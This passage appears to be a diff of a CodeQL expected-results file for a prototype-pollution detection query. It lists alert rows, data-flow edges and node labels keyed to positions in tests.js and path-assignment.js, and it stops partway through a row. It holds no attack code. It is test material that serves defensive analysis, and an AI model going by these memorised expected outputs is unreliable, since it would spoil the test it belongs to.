tests.js:8:13:8:15 | dst | tests.js:4:14:4:16 | key | tests.js:8:13:8:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:4:21:4:23 | src | src | tests.js:8:13:8:15 | dst | dst | +| tests.js:18:13:18:15 | dst | tests.js:14:30:14:32 | key | tests.js:18:13:18:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:14:17:14:19 | src | src | tests.js:18:13:18:15 | dst | dst | +| tests.js:36:9:36:11 | dst | tests.js:25:18:25:20 | key | tests.js:36:9:36:11 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:25:25:25:30 | source | source | tests.js:36:9:36:11 | dst | dst | +| tests.js:46:13:46:15 | dst | tests.js:41:14:41:16 | key | tests.js:46:13:46:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:41:21:41:23 | src | src | tests.js:46:13:46:15 | dst | dst | +| tests.js:57:13:57:15 | dst | tests.js:52:14:52:16 | key | tests.js:57:13:57:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:52:21:52:23 | src | src | tests.js:57:13:57:15 | dst | dst | +| tests.js:109:13:109:15 | dst | tests.js:102:14:102:16 | key | tests.js:109:13:109:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:102:21:102:23 | src | src | tests.js:109:13:109:15 | dst | dst | +| tests.js:154:13:154:15 | dst | tests.js:150:14:150:16 | key | tests.js:154:13:154:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:150:21:150:23 | src | src | tests.js:154:13:154:15 | dst | dst | +| tests.js:196:13:196:15 | dst | tests.js:192:19:192:25 | keys[i] | tests.js:196:13:196:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:190:28:190:30 | src | src | tests.js:196:13:196:15 | dst | dst | +| tests.js:233:5:233:13 | map[key1] | tests.js:238:14:238:16 | key | tests.js:233:5:233:13 | map[key1] | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:238:21:238:24 | data | data | tests.js:233:5:233:13 | map[key1] | here | +| tests.js:270:13:270:15 | dst | tests.js:265:19:265:26 | entry[0] | tests.js:270:13:270:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:264:20:264:22 | src | src | tests.js:270:13:270:15 | dst | dst | +| tests.js:280:13:280:15 | dst | tests.js:276:34:276:36 | key | tests.js:280:13:280:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:276:21:276:23 | src | src | tests.js:280:13:280:15 | dst | dst | +| tests.js:308:17:308:19 | dst | tests.js:302:14:302:16 | key | tests.js:308:17:308:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:302:21:302:23 | src | src | tests.js:308:17:308:19 | dst | dst | +| tests.js:322:17:322:19 | dst | tests.js:315:14:315:16 | key | tests.js:322:17:322:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:315:21:315:23 | src | src | tests.js:322:17:322:19 | dst | dst | +| tests.js:338:17:338:19 | dst | tests.js:329:14:329:16 | key | tests.js:338:17:338:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:329:21:329:23 | src | src | tests.js:338:17:338:19 | dst | dst | +| tests.js:357:17:357:22 | target | tests.js:350:37:350:39 | key | tests.js:357:17:357:22 | target | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:350:21:350:26 | source | source | tests.js:357:17:357:22 | target | target | +| tests.js:403:13:403:15 | dst | tests.js:381:14:381:16 | key | tests.js:403:13:403:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:381:21:381:23 | obj | obj | tests.js:403:13:403:15 | dst | dst | +| tests.js:419:13:419:15 | dst | tests.js:413:14:413:16 | key | tests.js:419:13:419:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:413:21:413:23 | src | src | tests.js:419:13:419:15 | dst | dst | +| tests.js:436:13:436:15 | dst | tests.js:430:14:430:16 | key | tests.js:436:13:436:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:430:21:430:23 | src | src | tests.js:436:13:436:15 | dst | dst | +| tests.js:465:30:465:32 | dst | tests.js:460:25:460:27 | key | tests.js:465:30:465:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:465:30:465:32 | dst | dst | +| tests.js:466:30:466:32 | dst | tests.js:460:25:460:27 | key | tests.js:466:30:466:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:466:30:466:32 | dst | dst | +| tests.js:467:30:467:32 | dst | tests.js:460:25:460:27 | key | tests.js:467:30:467:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:467:30:467:32 | dst | dst | +| tests.js:477:13:477:15 | dst | tests.js:473:25:473:27 | key | tests.js:477:13:477:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:473:12:473:14 | src | src | tests.js:477:13:477:15 | dst | dst | +| tests.js:489:13:489:15 | dst | tests.js:484:14:484:16 | key | tests.js:489:13:489:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:484:21:484:23 | src | src | tests.js:489:13:489:15 | dst | dst | +| tests.js:517:35:517:37 | dst | tests.js:511:19:511:25 | keys[i] | tests.js:517:35:517:37 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:509:28:509:30 | src | src | tests.js:517:35:517:37 | dst | dst | +| tests.js:529:13:529:15 | dst | tests.js:525:14:525:16 | key | tests.js:529:13:529:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:525:21:525:23 | src | src | tests.js:529:13:529:15 | dst | dst | +| tests.js:547:13:547:15 | dst | tests.js:538:18:538:24 | keys[i] | tests.js:547:13:547:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:535:30:535:32 | obj | obj | tests.js:547:13:547:15 | dst | dst | +| tests.js:605:13:605:16 | dest | tests.js:601:16:601:18 | key | tests.js:605:13:605:16 | dest | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:601:35:601:40 | source | source | tests.js:605:13:605:16 | dest | dest | edges | examples/PrototypePollutingFunction.js:1:16:1:18 | dst | examples/PrototypePollutingFunction.js:5:19:5:21 | dst | provenance | | | examples/PrototypePollutingFunction.js:1:16:1:18 | dst | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | provenance | | @@ -1368,6 +748,659 @@ edges | tests.js:605:40:605:50 | source[key] | tests.js:591:25:591:27 | obj | provenance | | | tests.js:605:40:605:50 | source[key] | tests.js:605:25:605:51 | capture ... e[key]) | provenance | | | tests.js:605:47:605:49 | key | tests.js:605:40:605:50 | source[key] | provenance | Config | +nodes +| examples/PrototypePollutingFunction.js:1:16:1:18 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:2:14:2:16 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:5:19:5:21 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:5:19:5:26 | dst[key] | semmle.label | dst[key] | +| examples/PrototypePollutingFunction.js:5:23:5:25 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:5:29:5:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:5:29:5:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction.js:5:33:5:35 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | semmle.label | dst | +| examples/PrototypePollutingFunction.js:7:17:7:19 | key | semmle.label | key | +| examples/PrototypePollutingFunction.js:7:24:7:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction.js:7:24:7:31 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction.js:7:28:7:30 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed2.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:6:29:6:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:6:29:6:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed2.js:8:24:8:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed2.js:8:24:8:31 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed.js:1:21:1:23 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:2:14:2:16 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed.js:5:29:5:31 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:5:29:5:36 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed.js:7:17:7:19 | key | semmle.label | key | +| examples/PrototypePollutingFunction_fixed.js:7:24:7:26 | src | semmle.label | src | +| examples/PrototypePollutingFunction_fixed.js:7:24:7:31 | src[key] | semmle.label | src[key] | +| examples/PrototypePollutingFunction_fixed.js:7:28:7:30 | key | semmle.label | key | +| path-assignment.js:8:13:8:25 | key | semmle.label | key | +| path-assignment.js:8:19:8:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:13:13:13:32 | target | semmle.label | target | +| path-assignment.js:13:22:13:27 | target | semmle.label | target | +| path-assignment.js:13:22:13:32 | target[key] | semmle.label | target[key] | +| path-assignment.js:13:29:13:31 | key | semmle.label | key | +| path-assignment.js:15:13:15:18 | target | semmle.label | target | +| path-assignment.js:15:20:15:22 | key | semmle.label | key | +| path-assignment.js:41:13:41:25 | key | semmle.label | key | +| path-assignment.js:41:19:41:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:42:9:42:48 | target | semmle.label | target | +| path-assignment.js:42:18:42:23 | target | semmle.label | target | +| path-assignment.js:42:25:42:27 | key | semmle.label | key | +| path-assignment.js:42:32:42:37 | target | semmle.label | target | +| path-assignment.js:42:32:42:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:42:32:42:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:42:39:42:41 | key | semmle.label | key | +| path-assignment.js:44:5:44:10 | target | semmle.label | target | +| path-assignment.js:44:12:44:18 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:58:13:58:25 | key | semmle.label | key | +| path-assignment.js:58:19:58:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:59:9:59:48 | target | semmle.label | target | +| path-assignment.js:59:18:59:23 | target | semmle.label | target | +| path-assignment.js:59:25:59:27 | key | semmle.label | key | +| path-assignment.js:59:32:59:37 | target | semmle.label | target | +| path-assignment.js:59:32:59:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:59:32:59:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:59:39:59:41 | key | semmle.label | key | +| path-assignment.js:61:5:61:10 | target | semmle.label | target | +| path-assignment.js:61:12:61:18 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:68:13:68:25 | key | semmle.label | key | +| path-assignment.js:68:19:68:25 | keys[i] | semmle.label | keys[i] | +| path-assignment.js:69:9:69:48 | target | semmle.label | target | +| path-assignment.js:69:18:69:23 | target | semmle.label | target | +| path-assignment.js:69:25:69:27 | key | semmle.label | key | +| path-assignment.js:69:32:69:37 | target | semmle.label | target | +| path-assignment.js:69:32:69:42 | target[key] | semmle.label | target[key] | +| path-assignment.js:69:32:69:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | +| path-assignment.js:69:39:69:41 | key | semmle.label | key | +| path-assignment.js:71:5:71:10 | target | semmle.label | target | +| path-assignment.js:71:12:71:18 | keys[i] | semmle.label | keys[i] | +| tests.js:3:25:3:27 | dst | semmle.label | dst | +| tests.js:3:30:3:32 | src | semmle.label | src | +| tests.js:4:14:4:16 | key | semmle.label | key | +| tests.js:6:28:6:30 | dst | semmle.label | dst | +| tests.js:6:28:6:35 | dst[key] | semmle.label | dst[key] | +| tests.js:6:32:6:34 | key | semmle.label | key | +| tests.js:6:38:6:40 | src | semmle.label | src | +| tests.js:6:38:6:45 | src[key] | semmle.label | src[key] | +| tests.js:6:42:6:44 | key | semmle.label | key | +| tests.js:8:13:8:15 | dst | semmle.label | dst | +| tests.js:8:17:8:19 | key | semmle.label | key | +| tests.js:8:24:8:26 | src | semmle.label | src | +| tests.js:8:24:8:31 | src[key] | semmle.label | src[key] | +| tests.js:8:28:8:30 | key | semmle.label | key | +| tests.js:13:24:13:26 | dst | semmle.label | dst | +| tests.js:13:29:13:31 | src | semmle.label | src | +| tests.js:14:17:14:19 | src | semmle.label | src | +| tests.js:14:30:14:32 | key | semmle.label | key | +| tests.js:16:27:16:29 | dst | semmle.label | dst | +| tests.js:16:27:16:34 | dst[key] | semmle.label | dst[key] | +| tests.js:16:31:16:33 | key | semmle.label | key | +| tests.js:16:37:16:39 | src | semmle.label | src | +| tests.js:16:37:16:44 | src[key] | semmle.label | src[key] | +| tests.js:16:41:16:43 | key | semmle.label | key | +| tests.js:18:13:18:15 | dst | semmle.label | dst | +| tests.js:18:17:18:19 | key | semmle.label | key | +| tests.js:18:24:18:26 | src | semmle.label | src | +| tests.js:18:24:18:31 | src[key] | semmle.label | src[key] | +| tests.js:18:28:18:30 | key | semmle.label | key | +| tests.js:23:19:23:21 | dst | semmle.label | dst | +| tests.js:23:27:23:33 | sources [0] | semmle.label | sources [0] | +| tests.js:24:14:24:19 | source | semmle.label | source | +| tests.js:24:24:24:30 | sources [0] | semmle.label | sources [0] | +| tests.js:25:18:25:20 | key | semmle.label | key | +| tests.js:26:25:26:27 | dst | semmle.label | dst | +| tests.js:26:30:26:35 | source | semmle.label | source | +| tests.js:26:30:26:40 | source[key] | semmle.label | source[key] | +| tests.js:26:37:26:39 | key | semmle.label | key | +| tests.js:26:43:26:45 | key | semmle.label | key | +| tests.js:31:22:31:24 | dst | semmle.label | dst | +| tests.js:31:27:31:31 | value | semmle.label | value | +| tests.js:31:34:31:36 | key | semmle.label | key | +| tests.js:32:9:32:27 | dstValue | semmle.label | dstValue | +| tests.js:32:20:32:22 | dst | semmle.label | dst | +| tests.js:32:20:32:27 | dst[key] | semmle.label | dst[key] | +| tests.js:32:24:32:26 | key | semmle.label | key | +| tests.js:34:18:34:25 | dstValue | semmle.label | dstValue | +| tests.js:34:28:34:32 | value | semmle.label | value | +| tests.js:36:9:36:11 | dst | semmle.label | dst | +| tests.js:36:13:36:15 | key | semmle.label | key | +| tests.js:36:20:36:24 | value | semmle.label | value | +| tests.js:40:27:40:29 | dst | semmle.label | dst | +| tests.js:40:32:40:34 | src | semmle.label | src | +| tests.js:41:14:41:16 | key | semmle.label | key | +| tests.js:44:30:44:32 | dst | semmle.label | dst | +| tests.js:44:30:44:37 | dst[key] | semmle.label | dst[key] | +| tests.js:44:34:44:36 | key | semmle.label | key | +| tests.js:44:40:44:42 | src | semmle.label | src | +| tests.js:44:40:44:47 | src[key] | semmle.label | src[key] | +| tests.js:44:44:44:46 | key | semmle.label | key | +| tests.js:46:13:46:15 | dst | semmle.label | dst | +| tests.js:46:17:46:19 | key | semmle.label | key | +| tests.js:46:24:46:26 | src | semmle.label | src | +| tests.js:46:24:46:31 | src[key] | semmle.label | src[key] | +| tests.js:46:28:46:30 | key | semmle.label | key | +| tests.js:51:26:51:28 | dst | semmle.label | dst | +| tests.js:51:31:51:33 | src | semmle.label | src | +| tests.js:52:14:52:16 | key | semmle.label | key | +| tests.js:55:29:55:31 | dst | semmle.label | dst | +| tests.js:55:29:55:36 | dst[key] | semmle.label | dst[key] | +| tests.js:55:33:55:35 | key | semmle.label | key | +| tests.js:55:39:55:41 | src | semmle.label | src | +| tests.js:55:39:55:46 | src[key] | semmle.label | src[key] | +| tests.js:55:43:55:45 | key | semmle.label | key | +| tests.js:57:13:57:15 | dst | semmle.label | dst | +| tests.js:57:17:57:19 | key | semmle.label | key | +| tests.js:57:24:57:26 | src | semmle.label | src | +| tests.js:57:24:57:31 | src[key] | semmle.label | src[key] | +| tests.js:57:28:57:30 | key | semmle.label | key | +| tests.js:62:33:62:35 | src | semmle.label | src | +| tests.js:66:41:66:43 | src | semmle.label | src | +| tests.js:66:41:66:48 | src[key] | semmle.label | src[key] | +| tests.js:68:24:68:26 | src | semmle.label | src | +| tests.js:68:24:68:31 | src[key] | semmle.label | src[key] | +| tests.js:77:27:77:29 | src | semmle.label | src | +| tests.js:81:39:81:41 | src | semmle.label | src | +| tests.js:81:39:81:46 | src[key] | semmle.label | src[key] | +| tests.js:83:28:83:30 | src | semmle.label | src | +| tests.js:83:28:83:35 | src[key] | semmle.label | src[key] | +| tests.js:89:34:89:36 | src | semmle.label | src | +| tests.js:90:14:90:16 | key | semmle.label | key | +| tests.js:94:42:94:44 | src | semmle.label | src | +| tests.js:94:42:94:49 | src[key] | semmle.label | src[key] | +| tests.js:96:17:96:19 | key | semmle.label | key | +| tests.js:96:24:96:26 | src | semmle.label | src | +| tests.js:96:24:96:31 | src[key] | semmle.label | src[key] | +| tests.js:96:28:96:30 | key | semmle.label | key | +| tests.js:101:32:101:34 | dst | semmle.label | dst | +| tests.js:101:37:101:39 | src | semmle.label | src | +| tests.js:102:14:102:16 | key | semmle.label | key | +| tests.js:107:35:107:37 | dst | semmle.label | dst | +| tests.js:107:35:107:42 | dst[key] | semmle.label | dst[key] | +| tests.js:107:39:107:41 | key | semmle.label | key | +| tests.js:107:45:107:47 | src | semmle.label | src | +| tests.js:107:45:107:52 | src[key] | semmle.label | src[key] | +| tests.js:107:49:107:51 | key | semmle.label | key | +| tests.js:109:13:109:15 | dst | semmle.label | dst | +| tests.js:109:17:109:19 | key | semmle.label | key | +| tests.js:109:24:109:26 | src | semmle.label | src | +| tests.js:109:24:109:31 | src[key] | semmle.label | src[key] | +| tests.js:109:28:109:30 | key | semmle.label | key | +| tests.js:116:41:116:43 | src | semmle.label | src | +| tests.js:117:14:117:16 | key | semmle.label | key | +| tests.js:119:49:119:51 | src | semmle.label | src | +| tests.js:119:49:119:56 | src[key] | semmle.label | src[key] | +| tests.js:121:17:121:19 | key | semmle.label | key | +| tests.js:121:24:121:26 | src | semmle.label | src | +| tests.js:121:24:121:31 | src[key] | semmle.label | src[key] | +| tests.js:121:28:121:30 | key | semmle.label | key | +| tests.js:149:31:149:33 | dst | semmle.label | dst | +| tests.js:149:36:149:38 | src | semmle.label | src | +| tests.js:150:14:150:16 | key | semmle.label | key | +| tests.js:152:22:152:24 | dst | semmle.label | dst | +| tests.js:152:27:152:29 | src | semmle.label | src | +| tests.js:152:32:152:34 | key | semmle.label | key | +| tests.js:154:13:154:15 | dst | semmle.label | dst | +| tests.js:154:17:154:19 | key | semmle.label | key | +| tests.js:154:24:154:26 | src | semmle.label | src | +| tests.js:154:24:154:31 | src[key] | semmle.label | src[key] | +| tests.js:154:28:154:30 | key | semmle.label | key | +| tests.js:159:36:159:38 | dst | semmle.label | dst | +| tests.js:159:41:159:43 | src | semmle.label | src | +| tests.js:160:26:160:28 | dst | semmle.label | dst | +| tests.js:160:31:160:33 | src | semmle.label | src | +| tests.js:160:37:160:39 | dst | semmle.label | dst | +| tests.js:160:42:160:44 | src | semmle.label | src | +| tests.js:160:47:160:49 | key | semmle.label | key | +| tests.js:161:35:161:37 | dst | semmle.label | dst | +| tests.js:161:35:161:42 | dst[key] | semmle.label | dst[key] | +| tests.js:161:39:161:41 | key | semmle.label | key | +| tests.js:161:45:161:47 | src | semmle.label | src | +| tests.js:161:45:161:52 | src[key] | semmle.label | src[key] | +| tests.js:161:49:161:51 | key | semmle.label | key | +| tests.js:165:37:165:39 | src | semmle.label | src | +| tests.js:166:14:166:16 | key | semmle.label | key | +| tests.js:169:45:169:47 | src | semmle.label | src | +| tests.js:169:45:169:52 | src[key] | semmle.label | src[key] | +| tests.js:169:49:169:51 | key | semmle.label | key | +| tests.js:171:17:171:19 | key | semmle.label | key | +| tests.js:171:24:171:26 | src | semmle.label | src | +| tests.js:171:24:171:31 | src[key] | semmle.label | src[key] | +| tests.js:171:28:171:30 | key | semmle.label | key | +| tests.js:178:33:178:35 | src | semmle.label | src | +| tests.js:182:41:182:43 | src | semmle.label | src | +| tests.js:182:41:182:48 | src[key] | semmle.label | src[key] | +| tests.js:184:24:184:26 | src | semmle.label | src | +| tests.js:184:24:184:31 | src[key] | semmle.label | src[key] | +| tests.js:189:32:189:34 | dst | semmle.label | dst | +| tests.js:189:37:189:39 | src | semmle.label | src | +| tests.js:192:13:192:25 | key | semmle.label | key | +| tests.js:192:19:192:25 | keys[i] | semmle.label | keys[i] | +| tests.js:194:35:194:37 | dst | semmle.label | dst | +| tests.js:194:35:194:42 | dst[key] | semmle.label | dst[key] | +| tests.js:194:39:194:41 | key | semmle.label | key | +| tests.js:194:45:194:47 | src | semmle.label | src | +| tests.js:194:45:194:52 | src[key] | semmle.label | src[key] | +| tests.js:194:49:194:51 | key | semmle.label | key | +| tests.js:196:13:196:15 | dst | semmle.label | dst | +| tests.js:196:17:196:19 | key | semmle.label | key | +| tests.js:196:24:196:26 | src | semmle.label | src | +| tests.js:196:24:196:31 | src[key] | semmle.label | src[key] | +| tests.js:196:28:196:30 | key | semmle.label | key | +| tests.js:201:39:201:41 | dst | semmle.label | dst | +| tests.js:201:44:201:46 | src | semmle.label | src | +| tests.js:206:42:206:44 | dst | semmle.label | dst | +| tests.js:206:42:206:53 | dst[keys[i]] | semmle.label | dst[keys[i]] | +| tests.js:206:46:206:52 | keys[i] | semmle.label | keys[i] | +| tests.js:206:56:206:58 | src | semmle.label | src | +| tests.js:206:56:206:67 | src[keys[i]] | semmle.label | src[keys[i]] | +| tests.js:206:60:206:66 | keys[i] | semmle.label | keys[i] | +| tests.js:208:13:208:15 | dst | semmle.label | dst | +| tests.js:208:17:208:23 | keys[i] | semmle.label | keys[i] | +| tests.js:208:28:208:30 | src | semmle.label | src | +| tests.js:208:28:208:39 | src[keys[i]] | semmle.label | src[keys[i]] | +| tests.js:208:32:208:38 | keys[i] | semmle.label | keys[i] | +| tests.js:213:23:213:26 | key1 | semmle.label | key1 | +| tests.js:213:29:213:32 | key2 | semmle.label | key2 | +| tests.js:213:35:213:39 | value | semmle.label | value | +| tests.js:217:5:217:13 | map[key1] | semmle.label | map[key1] | +| tests.js:217:9:217:12 | key1 | semmle.label | key1 | +| tests.js:217:15:217:18 | key2 | semmle.label | key2 | +| tests.js:217:23:217:27 | value | semmle.label | value | +| tests.js:223:14:223:16 | key | semmle.label | key | +| tests.js:224:23:224:25 | key | semmle.label | key | +| tests.js:224:33:224:41 | data[key] | semmle.label | data[key] | +| tests.js:224:38:224:40 | key | semmle.label | key | +| tests.js:225:28:225:30 | key | semmle.label | key | +| tests.js:225:33:225:41 | data[key] | semmle.label | data[key] | +| tests.js:225:38:225:40 | key | semmle.label | key | +| tests.js:229:26:229:29 | key1 | semmle.label | key1 | +| tests.js:229:32:229:35 | key2 | semmle.label | key2 | +| tests.js:229:38:229:42 | value | semmle.label | value | +| tests.js:233:5:233:13 | map[key1] | semmle.label | map[key1] | +| tests.js:233:9:233:12 | key1 | semmle.label | key1 | +| tests.js:233:15:233:18 | key2 | semmle.label | key2 | +| tests.js:233:23:233:27 | value | semmle.label | value | +| tests.js:238:14:238:16 | key | semmle.label | key | +| tests.js:239:24:239:26 | key | semmle.label | key | +| tests.js:239:34:239:42 | data[key] | semmle.label | data[key] | +| tests.js:239:39:239:41 | key | semmle.label | key | +| tests.js:240:31:240:33 | key | semmle.label | key | +| tests.js:240:36:240:44 | data[key] | semmle.label | data[key] | +| tests.js:240:41:240:43 | key | semmle.label | key | +| tests.js:263:27:263:29 | dst | semmle.label | dst | +| tests.js:265:13:265:26 | key | semmle.label | key | +| tests.js:265:19:265:26 | entry[0] | semmle.label | entry[0] | +| tests.js:266:13:266:28 | value | semmle.label | value | +| tests.js:266:21:266:28 | entry[1] | semmle.label | entry[1] | +| tests.js:268:30:268:32 | dst | semmle.label | dst | +| tests.js:268:30:268:37 | dst[key] | semmle.label | dst[key] | +| tests.js:268:34:268:36 | key | semmle.label | key | +| tests.js:270:13:270:15 | dst | semmle.label | dst | +| tests.js:270:17:270:19 | key | semmle.label | key | +| tests.js:270:24:270:28 | value | semmle.label | value | +| tests.js:275:27:275:29 | dst | semmle.label | dst | +| tests.js:275:32:275:34 | src | semmle.label | src | +| tests.js:276:21:276:23 | src | semmle.label | src | +| tests.js:276:34:276:36 | key | semmle.label | key | +| tests.js:278:30:278:32 | dst | semmle.label | dst | +| tests.js:278:30:278:37 | dst[key] | semmle.label | dst[key] | +| tests.js:278:34:278:36 | key | semmle.label | key | +| tests.js:278:40:278:42 | src | semmle.label | src | +| tests.js:278:40:278:47 | src[key] | semmle.label | src[key] | +| tests.js:278:44:278:46 | key | semmle.label | key | +| tests.js:280:13:280:15 | dst | semmle.label | dst | +| tests.js:280:17:280:19 | key | semmle.label | key | +| tests.js:280:24:280:26 | src | semmle.label | src | +| tests.js:280:24:280:31 | src[key] | semmle.label | src[key] | +| tests.js:280:28:280:30 | key | semmle.label | key | +| tests.js:301:27:301:29 | dst | semmle.label | dst | +| tests.js:301:32:301:34 | src | semmle.label | src | +| tests.js:302:14:302:16 | key | semmle.label | key | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:17:304:32 | value | semmle.label | value | +| tests.js:304:25:304:27 | src | semmle.label | src | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | +| tests.js:304:29:304:31 | key | semmle.label | key | +| tests.js:306:34:306:36 | dst | semmle.label | dst | +| tests.js:306:34:306:41 | dst[key] | semmle.label | dst[key] | +| tests.js:306:38:306:40 | key | semmle.label | key | +| tests.js:306:44:306:48 | value | semmle.label | value | +| tests.js:308:17:308:19 | dst | semmle.label | dst | +| tests.js:308:21:308:23 | key | semmle.label | key | +| tests.js:308:28:308:32 | value | semmle.label | value | +| tests.js:314:31:314:33 | dst | semmle.label | dst | +| tests.js:314:36:314:38 | src | semmle.label | src | +| tests.js:315:14:315:16 | key | semmle.label | key | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:17:318:32 | value | semmle.label | value | +| tests.js:318:25:318:27 | src | semmle.label | src | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | +| tests.js:318:29:318:31 | key | semmle.label | key | +| tests.js:320:38:320:40 | dst | semmle.label | dst | +| tests.js:320:38:320:45 | dst[key] | semmle.label | dst[key] | +| tests.js:320:42:320:44 | key | semmle.label | key | +| tests.js:320:48:320:52 | value | semmle.label | value | +| tests.js:322:17:322:19 | dst | semmle.label | dst | +| tests.js:322:21:322:23 | key | semmle.label | key | +| tests.js:322:28:322:32 | value | semmle.label | value | +| tests.js:328:25:328:27 | dst | semmle.label | dst | +| tests.js:328:30:328:32 | src | semmle.label | src | +| tests.js:329:14:329:16 | key | semmle.label | key | +| tests.js:336:32:336:34 | dst | semmle.label | dst | +| tests.js:336:32:336:39 | dst[key] | semmle.label | dst[key] | +| tests.js:336:36:336:38 | key | semmle.label | key | +| tests.js:336:42:336:44 | src | semmle.label | src | +| tests.js:336:42:336:49 | src[key] | semmle.label | src[key] | +| tests.js:336:46:336:48 | key | semmle.label | key | +| tests.js:338:17:338:19 | dst | semmle.label | dst | +| tests.js:338:21:338:23 | key | semmle.label | key | +| tests.js:338:28:338:30 | src | semmle.label | src | +| tests.js:338:28:338:35 | src[key] | semmle.label | src[key] | +| tests.js:338:32:338:34 | key | semmle.label | key | +| tests.js:348:32:348:37 | target | semmle.label | target | +| tests.js:348:40:348:45 | source | semmle.label | source | +| tests.js:349:26:349:31 | target | semmle.label | target | +| tests.js:349:54:349:59 | source | semmle.label | source | +| tests.js:350:21:350:26 | source | semmle.label | source | +| tests.js:350:37:350:39 | key | semmle.label | key | +| tests.js:355:17:355:22 | target | semmle.label | target | +| tests.js:355:24:355:26 | key | semmle.label | key | +| tests.js:355:31:355:86 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | +| tests.js:355:53:355:58 | target | semmle.label | target | +| tests.js:355:53:355:63 | target[key] | semmle.label | target[key] | +| tests.js:355:60:355:62 | key | semmle.label | key | +| tests.js:355:66:355:71 | source | semmle.label | source | +| tests.js:355:66:355:76 | source[key] | semmle.label | source[key] | +| tests.js:357:17:357:22 | target | semmle.label | target | +| tests.js:357:24:357:26 | key | semmle.label | key | +| tests.js:357:31:357:36 | source | semmle.label | source | +| tests.js:357:31:357:41 | source[key] | semmle.label | source[key] | +| tests.js:357:38:357:40 | key | semmle.label | key | +| tests.js:361:12:361:17 | target | semmle.label | target | +| tests.js:364:41:364:46 | target | semmle.label | target | +| tests.js:364:49:364:54 | source | semmle.label | source | +| tests.js:366:18:366:20 | key | semmle.label | key | +| tests.js:371:24:371:26 | key | semmle.label | key | +| tests.js:371:31:371:95 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | +| tests.js:371:62:371:72 | target[key] | semmle.label | target[key] | +| tests.js:371:69:371:71 | key | semmle.label | key | +| tests.js:371:75:371:80 | source | semmle.label | source | +| tests.js:371:75:371:85 | source[key] | semmle.label | source[key] | +| tests.js:373:24:373:26 | key | semmle.label | key | +| tests.js:373:31:373:36 | source | semmle.label | source | +| tests.js:373:31:373:41 | source[key] | semmle.label | source[key] | +| tests.js:373:38:373:40 | key | semmle.label | key | +| 